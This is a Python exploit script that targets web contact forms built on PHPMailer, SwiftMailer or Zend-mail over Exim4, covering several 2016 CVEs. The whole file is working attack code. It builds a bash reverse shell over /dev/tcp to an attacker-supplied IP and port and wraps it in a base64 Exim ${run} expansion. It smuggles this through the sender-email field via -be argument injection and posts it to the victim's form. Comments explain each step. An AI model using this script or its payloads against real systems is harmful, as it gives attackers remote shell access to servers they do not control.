import argparse
import base64
import sys
import urllib
import urllib2
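# Prepare command for Exim expansion mode
def prepare_cmd(cmd):
    """Wrap a shell command in an Exim string expansion that executes it.

    The script later passes this text behind Exim's ``-be`` switch, which
    makes Exim evaluate it as an expansion string: ``${run{...}}`` runs a
    command and ``${base64d:...}`` decodes base64 first.  Base64-encoding
    *cmd* keeps quotes, spaces and ``$`` out of the expansion text, so the
    command survives both the shell and Exim's expansion parser untouched.

    Args:
        cmd: shell command to run on the target.  ``str`` is used as-is;
            ``unicode`` is UTF-8 encoded before base64 so non-ASCII no
            longer blows up inside ``b64encode``.

    Returns:
        ``str``: ``${run{${base64d:<base64 of cmd>}}}``.
    """
    if not isinstance(cmd, bytes):
        cmd = cmd.encode('utf-8')
    encoded = base64.b64encode(cmd)
    # Keep the native str type: b64encode already returns str on Python 2,
    # but bytes on Python 3, which would otherwise render as "b'...'".
    if not isinstance(encoded, str):
        encoded = encoded.decode('ascii')
    return '${run{${base64d:%s}}}' % encoded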
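# Send Request method
def send_request(req, timeout=None):
    """Open *req* (the contact-form POST) and discard the response.

    Args:
        req: urllib2.Request carrying the url-encoded form fields.
        timeout: optional socket timeout in seconds handed to urlopen;
            None (the default) keeps urlopen's own default, as before.

    Exits the script with status 3 on an HTTP error response and 4 on any
    other URLError (unresolvable host, connection refused, ...), printing
    the failing URL first.  The body is never read: whether the injected
    command ran is observed on the reverse-shell listener, not here.
    """
    try:
        if timeout is None:
            resp = urllib2.urlopen(req)
        else:
            resp = urllib2.urlopen(req, timeout=timeout)
        resp.close()
    except urllib2.HTTPError as e:
        # HTTPError is a URLError subclass, so it must be caught first.
        # `%` binds tighter than `+`: the original applied the format to the
        # trailing " - Check the URL!" fragment only, which raised TypeError
        # instead of printing anything.
        print("[!] Got HTTP error: [%d] when trying to reach %s - Check the URL!\n\n"
              % (e.code, req.get_full_url()))
        sys.exit(3)
    except urllib2.URLError as err:
        print("[!] Got the '%s' error when trying to reach %s - Check the URL!\n\n"
              % (err.reason, req.get_full_url()))
        sys.exit(4)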
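# Parse input args
parser = argparse.ArgumentParser(
    prog='rce_phpmailer_exim4.py',
    description='PHPMailer / Zend-mail / SwiftMailer - RCE Exploit for Exim4 based on LegalHackers sendmail version',
)
parser.add_argument('-url', dest='WEBAPP_BASE_URL', required=True, help='WebApp Base Url')
parser.add_argument('-cf', dest='CONTACT_SCRIPT', required=True, help='Contact Form scriptname')
parser.add_argument('-ip', dest='ATTACKER_IP', required=True, help='Attacker IP for reverse shell')
parser.add_argument('-p', dest='ATTACKER_PORT', required=False, help='Attackers Port for reverse shell', default="8888")
# --post-action supplies the VALUE of the fixed 'action' field (the code
# sends {'action': POST_ACTION}); the original help text wrongly called it a
# field name.  The other three --post-* options do override the NAME of the
# field carrying each value (see post_fields).
parser.add_argument('--post-action', dest='POST_ACTION', required=False, help='Overrides POST "action" field value', default="send")
parser.add_argument('--post-name', dest='POST_NAME', required=False, help='Overrides POST "name of sender" field name', default="name")
parser.add_argument('--post-email', dest='POST_EMAIL', required=False, help='Overrides POST "email" field name', default="email")
parser.add_argument('--post-msg', dest='POST_MSG', required=False, help='Overrides POST "message" field name', default="msg")
args = parser.parse_args()
# Plain concatenation: no separator is inserted, so -url must end with '/'
# (or -cf start with one) for the resulting URL to be right.
CONTACT_SCRIPT_URL = args.WEBAPP_BASE_URL + args.CONTACT_SCRIPT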
# Show params
# One row per command-line setting, printed in the order they were declared.
_shown_vars = (
    ('WEBAPP_BASE_URL', args.WEBAPP_BASE_URL),
    ('CONTACT_SCRIPT', args.CONTACT_SCRIPT),
    ('ATTACKER_IP', args.ATTACKER_IP),
    ('ATTACKER_PORT', args.ATTACKER_PORT),
    ('POST_ACTION', args.POST_ACTION),
    ('POST_NAME', args.POST_NAME),
    ('POST_EMAIL', args.POST_EMAIL),
    ('POST_MSG', args.POST_MSG),
)
# Header line, blank line, the rows, then a trailing blank line -- the same
# bytes the original multi-line template produced.
print("[+] Setting vars to: \n")
for _label, _value in _shown_vars:
    print("%s = [%s]" % (_label, _value))
print("")
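# Ask for mail library
print("[+] Choose your target / payload: ")
print("\033[1;34m")  # ANSI: bold blue for the menu
print("[1] PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)")
print(" SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)")
print(" Zend Framework / zend-mail < 2.4.11 - Remote Code Execution (CVE-2016-10034)\n")
print("[2] PHPMailer < 5.2.20 Remote Code Execution (CVE-2016-10045) - escapeshellarg() bypass")
print("\033[0m")  # ANSI reset
try:
    target = int(raw_input('[?] Select target [1-2]: '))
except ValueError:
    print("Not a valid choice. Exiting\n")
    sys.exit(2)
# Only 1 and 2 have payloads below.  The original checked `target > 2` only,
# so 0 and negative numbers fell through and silently ran as target 1.
if target < 1 or target > 2:
    print("No such target. Exiting\n")
    sys.exit(3)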
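################################
# Payload
################################
# Reverse shell: bash opens fd 196 as a TCP socket to the listener and hands
# it to `sh` as stdin/stdout/stderr, backgrounded under nohup so the calling
# process is not left waiting on it.  Listener address and port come from
# -ip/-p; the original hard-coded 192.168.1.19:1337 here and silently
# ignored both options.
cmd = ("/bin/bash -c '0<&196;exec 196<>/dev/tcp/%s/%s;nohup sh <&196 >&196 2>&196 &'"
       % (args.ATTACKER_IP, args.ATTACKER_PORT))
prepared_cmd = prepare_cmd(cmd)
# Injected sender address.  The escaped double quote is meant to terminate
# the quoted local-part so that `-be <expansion>` reaches the sendmail
# command line as extra switches (the argument injection described by the
# CVEs listed in the menu); `-be` makes Exim expand the string, and the
# ${run{...}} inside it executes cmd.
payload = '"a\\" -be ' + prepared_cmd + ' "@a.co'
# PHPMailer < 5.2.20 (CVE-2016-10045): escapeshellarg() single-quotes the
# address, so the breakout uses a backslash-escaped single quote instead.
if target == 2:
    payload = "\"a\\' -be " + prepared_cmd + " \"@a.co"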
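################################
# Attack episode
# This step will execute the reverse shell
################################
# Form fields.  'action' is a fixed field name whose value is POST_ACTION
# (default "send"); the other three --post-* options rename the field that
# carries each value.  The injected sender address goes in the e-mail field,
# which is what the contact script hands to the mail library.
# (The original wrapped every value in a no-op "%s" % ... -- dropped.)
post_fields = {
    'action': args.POST_ACTION,
    args.POST_NAME: 'Jas Fasola',
    args.POST_EMAIL: payload,
    args.POST_MSG: 'Really important message',
}
# Print relevant information
print("\n[+] Executing command on victim server\n")
print('[!] command: [%s]' % cmd)
print('[!] payload: [%s]' % payload)
print('[!] post_fields: [%s]\n' % str(post_fields))
data = urllib.urlencode(post_fields)
req = urllib2.Request(CONTACT_SCRIPT_URL, data)
# send_request exits the script itself on HTTP/transport errors.
send_request(req)
print("\033[1;32m[+] You should check your listener and cross the fingers ;)\033[0m\n")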